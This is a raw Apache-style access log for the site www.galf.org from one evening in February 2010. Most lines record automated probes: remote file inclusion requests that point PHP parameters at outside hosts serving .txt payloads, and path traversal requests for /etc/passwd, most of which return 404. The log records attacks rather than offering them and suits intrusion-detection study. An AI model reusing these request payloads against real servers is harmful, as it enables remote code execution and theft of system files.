216.104.40.170 - - [28/Feb/2010:20:00:00 -0800] "GET /logs/access.log%20%20//write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:00:00 -0800] "GET /logs//write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:00:12 -0800] "GET /logs/access.log%20%20//write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:00:12 -0800] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:00:12 -0800] "GET /logs//write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:00:57 -0800] "GET /logs/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:00:57 -0800] "GET /components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:00:57 -0800] "GET /logs/access_100201.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:00 -0800] "GET /logs/access_091221.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:01 -0800] "GET /logs/access_090817.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:01 -0800] "GET /logs/access_091012.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:01:21 -0800] "GET /logs/access_100201.log%20%20//write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:01:32 -0800] "GET /logs/access_100201.log%20%20//write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:38 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:42 -0800] "GET /logs/access_100125.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:43 -0800] "GET /logs/access_091207.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:44 -0800] "GET /logs/access_090928.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:44 -0800] "GET /logs/access_091005.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:01:49 -0800] "GET /logs/access_100118.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:02:11 -0800] "GET /logs/access_091116.log%20/index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:02:12 -0800] "GET /logs/access_091116.log%20/index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:02:12 -0800] "GET /index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:02:13 -0800] "GET /logs/index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:02:13 -0800] "GET /index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:02:13 -0800] "GET /logs/index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:02:55 -0800] "GET /logs/access_100222.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:03:02 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:20:03:33 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:03:37 -0800] "GET /logs/access_091019.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:04:08 -0800] "GET /logs/access_090831.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:20:04:08 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:20:04:08 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:20:04:11 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:04:13 -0800] "GET /logs/access_090824.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:04:14 -0800] "GET /logs/access_091116.log%20%20/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:20:05:57 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.125.93.75 - - [28/Feb/2010:20:07:07 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1245184 "http://www.galf.org/logs/scripts.log" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:07:08 -0800] "GET /logs/access_100201.log/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:20:07:08 -0800] "GET /logs/access_091221.log/components/com_virtuemart/install.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:20:07:51 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:20:07:51 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:20:07:51 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.40 - - [28/Feb/2010:20:08:01 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; ImageShack Toolbar 3.0.3)" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:08:40 -0800] "GET /logs/access_100208.log%20/index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:08:41 -0800] "GET /logs/access_100208.log%20/index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:09:02 -0800] "GET /logs/access_100208.log%20%20/?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:09:02 -0800] "GET /?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:09:02 -0800] "GET /logs/?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:09:08 -0800] "GET /logs/access_100208.log%20%20/?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:09:08 -0800] "GET /?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:09:08 -0800] "GET /logs/?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:20:10:01 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:20:10:01 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:20:10:01 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [28/Feb/2010:20:12:31 -0800] "GET /logs/access_100118.log//?_zb_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [28/Feb/2010:20:12:31 -0800] "GET /?_zb_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [28/Feb/2010:20:12:31 -0800] "GET /logs//?_zb_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [28/Feb/2010:20:12:41 -0800] "GET /?_zb_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [28/Feb/2010:20:12:41 -0800] "GET /logs/access_100118.log//?_zb_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [28/Feb/2010:20:12:42 -0800] "GET /logs//?_zb_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:13:14 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:13:14 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:14:35 -0800] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:14:35 -0800] "GET /index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:14:35 -0800] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:20:14:36 -0800] "GET /index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:14:53 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:20:15:12 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:20:17:58 -0800] "GET /logs/access_100118.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:20:18:55 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:23 -0800] "GET /logs/access_090831.log%20%20//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:23 -0800] "GET /ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:23 -0800] "GET /logs//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:24 -0800] "GET /logs/access_090831.log%20%20//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:24 -0800] "GET /ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:24 -0800] "GET /logs//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:20:19:40 -0800] "GET /logs/access_091221.log//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:20:19:40 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:20:19:40 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:46 -0800] "GET /logs/access_091012.log%20%20//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:19:46 -0800] "GET /logs/access_091012.log%20%20//ashnews.php?pathtoashnews=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:20:20:20 -0800] "GET /logs/access_091221.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:20:20:38 -0800] "GET /logs/access_100118.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:21:56 -0800] "GET /logs/access_091026.log%20%20//index.php?framefile=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:21:56 -0800] "GET /index.php?framefile=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:21:56 -0800] "GET /logs//index.php?framefile=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:21:58 -0800] "GET /logs/access_091026.log%20%20//index.php?framefile=http://paku1.fileave.com/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:21:58 -0800] "GET /index.php?framefile=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:21:58 -0800] "GET /logs//index.php?framefile=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:23:56 -0800] "GET /logs/access_100118.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:23:56 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:23:56 -0800] "GET /logs/access_091005.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:23:56 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:25:21 -0800] "GET /logs/access_091214.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:25:34 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:26:12 -0800] "GET /logs/access_090928.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:26:35 -0800] "GET /logs/access_090928.log%20%20//secure_img_render.php?p=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:26:35 -0800] "GET /secure_img_render.php?p=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:26:35 -0800] "GET /logs/access_090928.log%20%20//secure_img_render.php?p=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:26:36 -0800] "GET /secure_img_render.php?p=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:26:36 -0800] "GET /logs//secure_img_render.php?p=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:26:36 -0800] "GET /logs//secure_img_render.php?p=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:28:00 -0800] "GET /logs/access_100208.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:20:29:12 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.92.23.144 - - [28/Feb/2010:20:29:12 -0800] "GET /logs/access.log//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.92.23.144 - - [28/Feb/2010:20:29:12 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /logs/access_090817.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:22 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:23 -0800] "GET /logs/access_090817.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:25 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:25 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:26 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:26 -0800] "GET /logs/access_090817.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:32:31 -0800] "GET /write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:32:31 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:32:31 -0800] "GET /logs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:35 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:35 -0800] "GET /logs/access_090928.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
